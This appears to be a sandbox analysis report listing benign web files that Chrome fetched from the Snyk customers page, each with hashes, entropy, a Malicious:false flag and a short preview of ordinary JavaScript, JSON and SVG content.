                                                                                                                                                                                                                                                                                                              Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2248],{37507:function(l,o,e){var i={"./asset-hyperlink.json":25994,"./blockquote.json":62559,"./document.json":51734,"./embedded-asset-block.json":1220,"./embedded-entry-block.json":72258,"./embedded-entry-inline.json":92204,"./embedded-resource-block.json":20546,"./embedded-resource-inline.json":8242,"./entry-hyperlink.json":6502,"./heading-1.json":92813,"./heading-2.json":45080,"./heading-3.json":86423,"./heading-4.json":34942,"./heading-5.json":95579,"./heading-6.json":50705,"./hr.json":37121,"./hyperlink.json":13165,"./list-item.json":38094,"./ordered-list.json":28122,"./paragraph.json":38986,"./resource-hyperlink.json":3105,"./table-cell.json":79924,"./table-header-cell.json":91787,"./table-row.json":75531,"./table.json":39269,"./text.json":63022,"./unordered-list.json":58500};function n(l){return e(a(l))}function a(l){if(!e.o(i,l)){var o=Error("Cannot find module '"+l+"'");throw o.code="MODULE_NOT_FOUND",o}return i[l]}n.key
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (51425), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):51449
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.165172322409541
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:UxXESOPBOxtOHYldgjbPh7LXBLTfqfobEMVvpxl+fm9re9PE8waMe:QUSgBOxEHEgjbp7LXBLTweXr9faMe
                                                                                                                                                                                                                                                                                                              MD5:B412936E97D581B80080C8DFB21C8F61
                                                                                                                                                                                                                                                                                                              SHA1:251DBB096EE8D23E54D83A010ADA4B1513BC6B9F
                                                                                                                                                                                                                                                                                                              SHA-256:7257538940DA97291AED70867A081BE37C2C1708F3DB76D5F54B0E8575B32D88
                                                                                                                                                                                                                                                                                                              SHA-512:253D74F4775C5ED0234F2206571C5E6B6884EB6B8B7A22ACC372E03C9E4857BF69FECAEDDBFEDFA4F4B8C2D3257E8B6A1347EE51F51626601AC0DBC0875B6690
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"fu1HALR4r60E7GmE8Aqkb","type":"Entry","createdAt":"2024-03-22T10:06:07.385Z","updatedAt":"2024-08-14T16:49:15.052Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":35,"revision":5,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"Customers default page","title":"Customers | Customers Stories & Case Studies | Snyk","slug":"customers-or-snyk","uri":"customers","pageLocalization":["fr","ja","pt-BR","de"],"seoSocialSharing":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"63Our3QnDuFGaQktiuwA5H","type":"Entry","createdAt":"2024-03-19T14:02:12.102Z","updatedAt":"2024-10-18T15:53:16.621Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Envi
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):41
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.07391321234758
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:YQZPNVUxXLWFOKaY:YQx+bOT
                                                                                                                                                                                                                                                                                                              MD5:8C11E15DB0F3E1EA036EDBA78ABF1151
                                                                                                                                                                                                                                                                                                              SHA1:72F74F85AA08C65E9927B8D53916A7C45A102D44
                                                                                                                                                                                                                                                                                                              SHA-256:AA011ED383CB780028A85CAAA0DDA67DCE19B0F4BC596F4F708D1857015C1362
                                                                                                                                                                                                                                                                                                              SHA-512:985C2D0148E254CA3386C955DB8F18C02639F156D0FF565BADA0CF91E52A691C504FAEA3A109F9D7CDB4A9C1F6CF48B343EEEEC5803941AE56599411388E4B9A
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:{"url":"https://scout.us2.salesloft.com"}
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (18122)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):240139
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.520225430933383
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:/IfEnRhbIGc3kWhF1ZF0cSncEjCPfrgiA4as3rOXk9nObg4:TRo3k4TCJviKs3qXk9nOb7
                                                                                                                                                                                                                                                                                                              MD5:3BD433563F5837C652D4A7DD37F046F9
                                                                                                                                                                                                                                                                                                              SHA1:ED2D37343B5EFEEC642D214C549E421330F4E9AE
                                                                                                                                                                                                                                                                                                              SHA-256:4D6F3E261043031365AE14811363456201DEAB9BFA5369B18702B2B1E6A32D6B
                                                                                                                                                                                                                                                                                                              SHA-512:04B6736456DC017F8A9E6127FA46F98EB1A3A463BCB490467AD9D90689B98101B5ECFF5A078A54406D927D32CF1290667314ED902CF97DA7F25A7AA290D9EF95
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"28",. . "macros":[{"function":"__e"},{"function":"__e"},{"function":"__c","vtp_value":"G-X9SH3KP7B4"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"category_name"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"cta_location"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"cta_name"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"cta_type"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"link_url"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"outbound"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"subcategory_name"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"newsletter_name"},{"function":
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2354), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2354
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.153215417418502
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:dhiaqD+ILRN1lCuPBzW/HDZPeRFVF1fdflKrp1yt1Jk9pNK/N569iohNf:qai+ILRN1ldzW/HZ4H1fdNKQ6a5VohB
                                                                                                                                                                                                                                                                                                              MD5:FCF06E135949A699D8950FEC18D1A14A
                                                                                                                                                                                                                                                                                                              SHA1:2B14C23101460DCE9D60F1C4319B6999EEB3A238
                                                                                                                                                                                                                                                                                                              SHA-256:52C33E15C3D7E4924C94171C8917A0239551234F0D3B602D5F4C55A244D839EA
                                                                                                                                                                                                                                                                                                              SHA-512:AFC80090D5ABD31EA69A33B78F8C145D127902C5962C3DCB76105611C6C1A4754A8EFED2275CD811DFE718B820640D46DC0FEFD69B5224F86DF7906376014406
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:"use strict";(()=>{function e(e){let t=location.href;if(e){let n=new URL(t);if(n.pathname!==e)return n.pathname=e,n.search="",n.href}return t}var t,n,a,r,i=(a=()=>{},()=>(a&&(r=a(a=0)),r));(t=()=>{i(),function(){let t=e=>e,n=document,a=n.currentScript,r=(null==a?void 0:a.dataset.endpoint)||(null!=a&&a.src.includes("/va/")?"/va":"/_vercel/insights"),i=null==a?void 0:a.dataset.disableAutoTrack,o=null,l=null,s=!0;async function u(e){if(e&&!Array.isArray(e))return{p:e};let t=n.querySelectorAll("[data-flag-values]");if(!a||!t.length)return;let r=new URL(a.src);return r.pathname=r.pathname.replace("/script.js","/flags/script.js"),import(r.href).then(n=>n.gather(t,e))}async function c({type:i,data:s,options:c}){var d,f;let h=e(l),p=n.referrer,v=t({type:i,url:h});if(!1===v||null===v)return;v&&(h=v.url);let w=p.includes(location.host),y={o:h,sv:"0.1.2",sdkn:null!=(d=null==a?void 0:a.dataset.sdkn)?d:void 0,sdkv:null!=(f=null==a?void 0:a.dataset.sdkv)?f:void 0,ts:Date.now(),...o&&{dp:o},...null!=
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (13465), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):13465
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.338829247140058
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:252M+F5E65RT8ITLhF4KRSgfBk3qkXZEd5NhHdzkHoh9X5GYjmt:252M+F22TXLr4Hp3nXZ88Hw9pmt
                                                                                                                                                                                                                                                                                                              MD5:59370E3451C4718A1194E07E3F4F3947
                                                                                                                                                                                                                                                                                                              SHA1:6AC814317E16F3D2F06DEF2533B053822DD2203F
                                                                                                                                                                                                                                                                                                              SHA-256:F9FCF0CEA9F4EE2AFE5A319C0E03CD66CD3A377FCB2F3CE36D3BFA011C66F112
                                                                                                                                                                                                                                                                                                              SHA-512:B6BB8232F8B704ECD08D9C515B21940E71FF5DBBBF326D60C7DBEEE0C3278EEAD2637EA8666197CE5E7281AC7D4ADBC0E0BDEE78B795764F0245C9344C91E040
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/static/chunks/2165.946eebc4630896bc.js
                                                                                                                                                                                                                                                                                                              Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2165],{8241:function(i,l,o){o.d(l,{d:function(){return n},x:function(){return e}});let e=function(i){let l=arguments.length>1&&void 0!==arguments[1]?arguments[1]:5,o=1;switch(!0){case i>0&&i<l:o=i;break;case i>=l:o=l;break;case l>=12:o=12}return o},n=i=>{let l={hasMaxWidth:!1,itemPadding:"extra-large",gap:"extra-large"};switch(!0){case i<=2:l.hasMaxWidth=!0;break;case 4===i:l.itemPadding="medium",l.gap="medium";break;case i>4:l.itemPadding="medium",l.gap="small"}return l}},73359:function(i,l,o){o.d(l,{Z:function(){return r}});var e=o(85893),n=o(45697),d=o.n(n),a=o(44133);function t(i){let{label:l,className:o}=i;return(0,e.jsx)("span",{className:(0,a.Z)("badge",o),"data-component":"Badge",children:l})}t.propTypes={label:d().string,type:d().string,className:d().string};var r=t},90913:function(i,l,o){var e=o(85893),n=o(45697),d=o.n(n),a=o(44133),t=o(15020),r=o(9981),s=o(23751);function u(i){let{gradient:l,position:o="to
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (6130), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):6130
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.322330260957124
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:CGAV18Q2IKhnQYpe8guQesm2bwTxmPnzadyXv9kZhkkA:C5VAxh08gJeUBPnedivWrkL
                                                                                                                                                                                                                                                                                                              MD5:14ECB509B1C65315B19DDBA87D8D8C4E
                                                                                                                                                                                                                                                                                                              SHA1:E6FEE5A0D9056A7D660A141FE0CA0DE7424BA227
                                                                                                                                                                                                                                                                                                              SHA-256:73B36FAA00DC82F45CFCE91FA262899ACB4960815752ECF11567F475F46E9592
                                                                                                                                                                                                                                                                                                              SHA-512:7A41EAD4D3A0F49AE312EF098E9DD7DE46B15812E6C0EA8B0DE7F25521FA5F6646D84C7B25450025F6475814BD980F556F9B71FB310AD913659BEFBCEE8C8213
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6316],{61375:function(l,e,i){i.d(e,{Q:function(){return o}});let o=l=>{let e=l.trim().split(" ");return e.reduce((l,i,o)=>((0===o||o===e.length-1)&&(l="".concat(l).concat(i.charAt(0).toUpperCase())),l),"")}},32026:function(l,e,i){i.d(e,{Z:function(){return c}});var o=i(85893),n=i(45697),a=i.n(n),d=i(7756),s=i(44133),r=i(61375);let t={"extra-small":18,small:24,medium:32,large:84,huge:140};function u(l){var e,i;let{name:n,size:a="small",as:u="div",shape:c="circular",src:v,hasShadow:m,style:h,className:g,...p}=l;return(0,o.jsx)(u,{className:(0,s.Z)("avatar min-w-medium",a&&"avatar-".concat(a),!v&&"no-image","rounded"===c&&"radius-large","circular"===c&&"radius-full",m&&"shadow-mid",g),style:h,"data-name":n&&(0,r.Q)(n),"data-component":"Avatar",children:v&&(0,o.jsx)(d.Z,{src:v,alt:null!=n?n:"",width:null!==(e=t[a])&&void 0!==e?e:24,height:null!==(i=t[a])&&void 0!==i?i:24,...p})})}u.propTypes={alt:a().string,as:a().oneOf(
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3501), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):3501
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.270298652138563
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:ibrmQEFBQKhTIS/sQ2byoAdOefjpdXxQdOefj9OZ4SaefjpKmyJMT2iXyemMWPn9:AdgM2/XVaKyriXUBv9
                                                                                                                                                                                                                                                                                                              MD5:063426302167D73BD81249302550A93B
                                                                                                                                                                                                                                                                                                              SHA1:1DF989309BE27A18514C92EC3309DDAF03B9BAF6
                                                                                                                                                                                                                                                                                                              SHA-256:5DB1F85737066099C0183984352DAB83CF3B3AD197304224A3804032139D9B9C
                                                                                                                                                                                                                                                                                                              SHA-512:1E529279D59F9A662D3A5FCDE292DD8E90AAF3A2A1C88F65FB5F2AAE224A7EE042475612381566387F0F0DC029EE3B2DCD149F1DC2A4E66F901807677EFCED2C
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2614],{5698:function(l,e,i){i.d(e,{Z:function(){return u}});var n=i(85893),r=i(67294),a=i(45697),s=i.n(a),o=i(40070),d=i(44133);function t(l){let e;let{logos:i,headline:a,isCluster:s,isScroll:t,taperFadeColor:u}=l,v=(0,r.useRef)(null),c=(0,r.useRef)(null);return(0,r.useEffect)(()=>{if(t){let l=c.current,e=v.current,i=0,n=new ResizeObserver(()=>{i=0,e.style.transform="translateX(-".concat(i,"px)")});n.observe(l);let r=()=>{(i+=.5)>1082&&(i=0),e.style.transform="translateX(-".concat(i,"px)"),requestAnimationFrame(r)},a=requestAnimationFrame(r);return()=>{cancelAnimationFrame(a),n.unobserve(l)}}},[t]),(0,n.jsxs)("div",{className:(0,d.Z)(s&&"bg-white radius-extra-large",!t&&"pad-h-huge mobile:pad-small"),"data-component":"Logo Parade",children:[a&&(0,n.jsx)("p",{className:"txt-subhead txt-color-headline txt-center marg-b-extra-large",children:a}),t?(0,n.jsx)("div",{ref:c,className:(0,d.Z)("w-full h-extra-large taper-fade
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2496), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):2496
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.081588928863935
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:ib5kS4K7sGAaGGD2GoGG7GrGcl2Gpd7GnKGslEGIFGVtYQGcHGbGhSGiGTxGnfct:br2ZWGPDqq6n3slhBVqz6hP/Tgf5BSDF
                                                                                                                                                                                                                                                                                                              MD5:76632CAA03FB2384173175C4284D918F
                                                                                                                                                                                                                                                                                                              SHA1:35D408896D528ED79CEEDCF9D4DD206EE1A0989A
                                                                                                                                                                                                                                                                                                              SHA-256:B91A6232D4455779D76494EEB4E1543A131E5DCBA7F89D37FAE47B9B8447131C
                                                                                                                                                                                                                                                                                                              SHA-512:3789CCBA166DB17075FA4A04F3D33BE4E8008E997B57F22AD5C830F440CCF5DD79F080A5297DEB7AA48F3D7CCAF07BEED92DAF86A39689FA4E2318954F7B5DB9
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/static/chunks/9384.57f0a60a33b0d128.js
                                                                                                                                                                                                                                                                                                              Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9384],{79384:function(l,i,d){d.r(i);var o=d(85893),v=d(43259),u=d(23751),n=d(8241),e=d(74129),s=d(86943);i.default=function(l){var i,d,a,t,c,r,f,m,g,h,p,_,b,k,y,x,N,C,H,q,w,B,E,G,Z,j,F,L,P,S,z,A,D,I,J,K;let{item:M,cols:O,settings:Q}=l,{pageColorScheme:R}=(0,u.tv)(),T=(0,n.d)(O).itemPadding;return(0,o.jsx)(v.Z,{logo:(null==M?void 0:null===(i=M.fields)||void 0===i?void 0:i.logo)&&{src:null==M?void 0:null===(t=M.fields)||void 0===t?void 0:null===(a=t.logo)||void 0===a?void 0:null===(d=a[0])||void 0===d?void 0:d.secure_url,alt:null==M?void 0:null===(f=M.fields)||void 0===f?void 0:null===(r=f.logo)||void 0===r?void 0:null===(c=r[0])||void 0===c?void 0:c.public_id},image:(null==M?void 0:null===(m=M.fields)||void 0===m?void 0:m.image)&&{src:null==M?void 0:null===(p=M.fields)||void 0===p?void 0:null===(h=p.image)||void 0===h?void 0:null===(g=h[0])||void 0===g?void 0:g.secure_url,alt:(null==M?void 0:null===(k=M.fields)||void
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (10380), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):10380
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.672662832928799
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:i6FUM8PlpbbpilbLVEKttmkuYaG25GvnyfS8HiGBYypxEntxpKdmgeGZNMWGUqpi:dUFJpixLVr4ku6R8BdaSe6XeEJ
                                                                                                                                                                                                                                                                                                              MD5:A6BEE80115850D6AF1DFC80F705E9AB7
                                                                                                                                                                                                                                                                                                              SHA1:36A2913FDD5932658593BC18B2FFB522778351B2
                                                                                                                                                                                                                                                                                                              SHA-256:D6ACF33945E326E29302FC4D888CBD3C794079F1F647E203EC447E6F15053634
                                                                                                                                                                                                                                                                                                              SHA-512:5337ACE4ACA07EF195CA73BEF06477E0BC8B49F540B00C29CA94FBFD94974D390FE53FE102718147B7902A9D67E3EE307386028DF3481AAB91937C3389879F07
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2135],{22135:function(e,n,t){var r,E,o,c,L,S,u,a,O,i,_,B,C,I,d,K,N=function(){return(N=Object.assign||function(e){for(var n,t=1,r=arguments.length;t<r;t++)for(var E in n=arguments[t])Object.prototype.hasOwnProperty.call(n,E)&&(e[E]=n[E]);return e}).apply(this,arguments)};"function"==typeof SuppressedError&&SuppressedError;var T="undefined"!=typeof globalThis?globalThis:"undefined"!=typeof window?window:void 0!==t.g?t.g:"undefined"!=typeof self?self:{},D={},A={};Object.defineProperty(A,"__esModule",{value:!0}),A.BLOCKS=void 0,(r=B||(A.BLOCKS=B={})).DOCUMENT="document",r.PARAGRAPH="paragraph",r.HEADING_1="heading-1",r.HEADING_2="heading-2",r.HEADING_3="heading-3",r.HEADING_4="heading-4",r.HEADING_5="heading-5",r.HEADING_6="heading-6",r.OL_LIST="ordered-list",r.UL_LIST="unordered-list",r.LIST_ITEM="list-item",r.HR="hr",r.QUOTE="blockquote",r.EMBEDDED_ENTRY="embedded-entry-block",r.EMBEDDED_ASSET="embedded-asset-block",r
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:C source, ASCII text, with very long lines (18167)
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):18168
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.58300957861083
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:YrFzeHc9iUGxrWa5GE2FDXPn1toA8AwpM4ndj69:Oze892aamz1CAgHdg
                                                                                                                                                                                                                                                                                                              MD5:3F44B799C727CBAC65D90F0779B8EB4E
                                                                                                                                                                                                                                                                                                              SHA1:77376CA0C1045402E9B434FB4BE8E6424BF6C7D2
                                                                                                                                                                                                                                                                                                              SHA-256:1220BDF087A7B3B0F068E1DC2422C361EF11CF999FF8EA343573D9E5A7C19BDC
                                                                                                                                                                                                                                                                                                              SHA-512:372AB2DBC89967B38ACA8B4B9AFCB0A5852C038D7632EBDF8E0E2F4074071E5243CADD1F36B3011267D565157FE2413B259246B8847DFEF461A93C1C74603BC4
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://assets.trendemon.com/global/identity.min.js
                                                                                                                                                                                                                                                                                                              Preview:!function(e,t,n,r){"use strict";n&&"undefined"!=typeof window&&"function"==typeof define&&define.amd?define(r):n&&"undefined"!=typeof module&&module.exports?module.exports=r():n&&t.exports?t.exports=r():t[e]=r()}("undefined"!=typeof window&&window.IdentityConfig?window.IdentityConfig.name:"Identity","undefined"!=typeof window&&window.IdentityConfig?window.IdentityConfig.context:this,"undefined"==typeof window||!window.IdentityConfig||window.IdentityConfig.enableModule,(function(){"use strict";void 0===Array.isArray&&(Array.isArray=function(e){return"[object Array]"===Object.prototype.toString.call(e)});var e=function(e,t){e=[e[0]>>>16,65535&e[0],e[1]>>>16,65535&e[1]],t=[t[0]>>>16,65535&t[0],t[1]>>>16,65535&t[1]];var n=[0,0,0,0];return n[3]+=e[3]+t[3],n[2]+=n[3]>>>16,n[3]&=65535,n[2]+=e[2]+t[2],n[1]+=n[2]>>>16,n[2]&=65535,n[1]+=e[1]+t[1],n[0]+=n[1]>>>16,n[1]&=65535,n[0]+=e[0]+t[0],n[0]&=65535,[n[0]<<16|n[1],n[2]<<16|n[3]]},t=function(e,t){e=[e[0]>>>16,65535&e[0],e[1]>>>16,65535&e[1]],t=
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:gzip compressed data, from Unix, original size modulo 2^32 15942
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):4743
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.949959131960823
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:5rk2n5vDZODWx7VwegK1sURWyRr+iie1VjiJ7zSIwWpYsdhMobUn:G2pDVx7Vbl1sURhhie1ANNisdGAk
                                                                                                                                                                                                                                                                                                              MD5:6A3ED21F9B6777C0C37E6E248EA22387
                                                                                                                                                                                                                                                                                                              SHA1:3BC32DC9AFFC61AA325B418166CF18E7C275B0E8
                                                                                                                                                                                                                                                                                                              SHA-256:4ADDCD9471A0DC0B228983E72308047F37BDFDD04CE20A9B97F43DE101AFC334
                                                                                                                                                                                                                                                                                                              SHA-512:5EE0DCD9A594DE8E9B1DA6366811CCE4AA83C27EA09AD80C188C203B5C3FA7BA0F65656937B6421C13E1F7BA6A054C4585E0FDB9A85EB8765F792DEC38F33E76
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:...........[.o.9.......h..N.....J...$..n...y|...f.2.V..d..Y......aK.v.8 ...&...U...Y.....Z..{..tc$.D..[N.d....U..T.>..0.8.j..j.~<M~...?.J.&..?.=........o.KDai_..G.a4....E6....ig.".%mf...OLh.......0.Y.,..?.K....KR......|..Td+s=/.<...rI._~...y..2.\..L...>.*.....iX..M..-..u...:..|,"X.'s\G6..DG...$...XdK...R...v5_.+....W&..h^.L...,..M(I...`.*.v.k..pF...3.dM...^E..,IF.N...s.L..8..1..._.O.(-..x....h.AI.:O%....{r..AY.b...v............dG$.J.b..)...V.U..../.*....b...3C...).:g..]....,.U=.(...*Nq.M..k*..9.1..O.!*.g..b..Vg..+...D.{..kQ..T..J...E;.Wt.7(37;..(....|./U:....Q.M!..l5.>...X....b..SI..`...&...BW..iG'n...}{(.S...G+...mj...s..+...~*....t....K.$w...x!..aV.i..a.zh.......}..]...S. m..2YD..@=...4..H.].'D...l.]..j.}.y.u..i.......5T.j..Hg#...C........T..248.i.4.,.9u67...9.7..*./2.....=h.Z.0...$....]...'<..88._O..%.%N.../.0..S.5s."....T6..w........<t..s..Uap.........F.Z.&O..0,.!_((s,...y.e...O......?...(.....?.5.|p......?.(..V.....r...(.XN...?.|......
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2907
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.751797784282422
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:2PGLUHQfoL98Ux43g5yk02Fv1gv7q2FvCCx0guFK3u498:mGLUwfzF0yugvu61uQ3u46
                                                                                                                                                                                                                                                                                                              MD5:2339CBE32EE9F36E5DDA6C9F14F54044
                                                                                                                                                                                                                                                                                                              SHA1:2B14105CD6CF5296D79C28EBCCE815B493568867
                                                                                                                                                                                                                                                                                                              SHA-256:C449CD497A6CCF0092A7E90F14689FCE6F9B0FE1AF917A5414D04F2D4561415F
                                                                                                                                                                                                                                                                                                              SHA-512:93C819A391EEA239E8DDA3FDE0BB473620E3522F0DD6033224FF4E7DF79EE3462840F67BEEE242041A07F21E40B724B683BA6FB2DFCC908BA80BA0637CED8235
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:<svg viewBox="0 0 121 15.01" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><clipPath id="a" transform="translate(-236.67 -413.68)"><path d="m236.67 413.68h121v15.01h-121z"/></clipPath><linearGradient id="b" gradientTransform="matrix(1 0 0 -1 -8.36 867.06)" gradientUnits="userSpaceOnUse" x1="251.43" x2="247.59" y1="445.41" y2="438.76"><stop offset="0" stop-color="#2a56a3"/><stop offset=".92" stop-color="#4577bb"/></linearGradient><g clip-path="url(#a)"><path d="m241.07 420.53a.42.42 0 0 0 -.38-.16.39.39 0 0 0 -.2.08.36.36 0 0 0 -.14.16l-3.63 7.27a.42.42 0 0 0 -.05.22.56.56 0 0 0 .06.21.57.57 0 0 0 .16.15.54.54 0 0 0 .21.05h5.07a.46.46 0 0 0 .23-.06.4.4 0 0 0 .16-.18 7.47 7.47 0 0 0 -1.49-7.74z" fill="url(#b)" transform="translate(-236.67 -413.68)"/><path d="m243.74 413.92a9.61 9.61 0 0 0 -.56 9.47l2.44 4.88a.41.41 0 0 0 .39.24h5.06a.54.54 0 0 0 .22-.05.54.54 0 0 0 .15-.15.58.58 0 0 0 .07-.21.42.42 0 0 0 0-.22l-7-14a.57.57 0 0 0 -.15-.16.47.47 0 0 0 -.22-.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
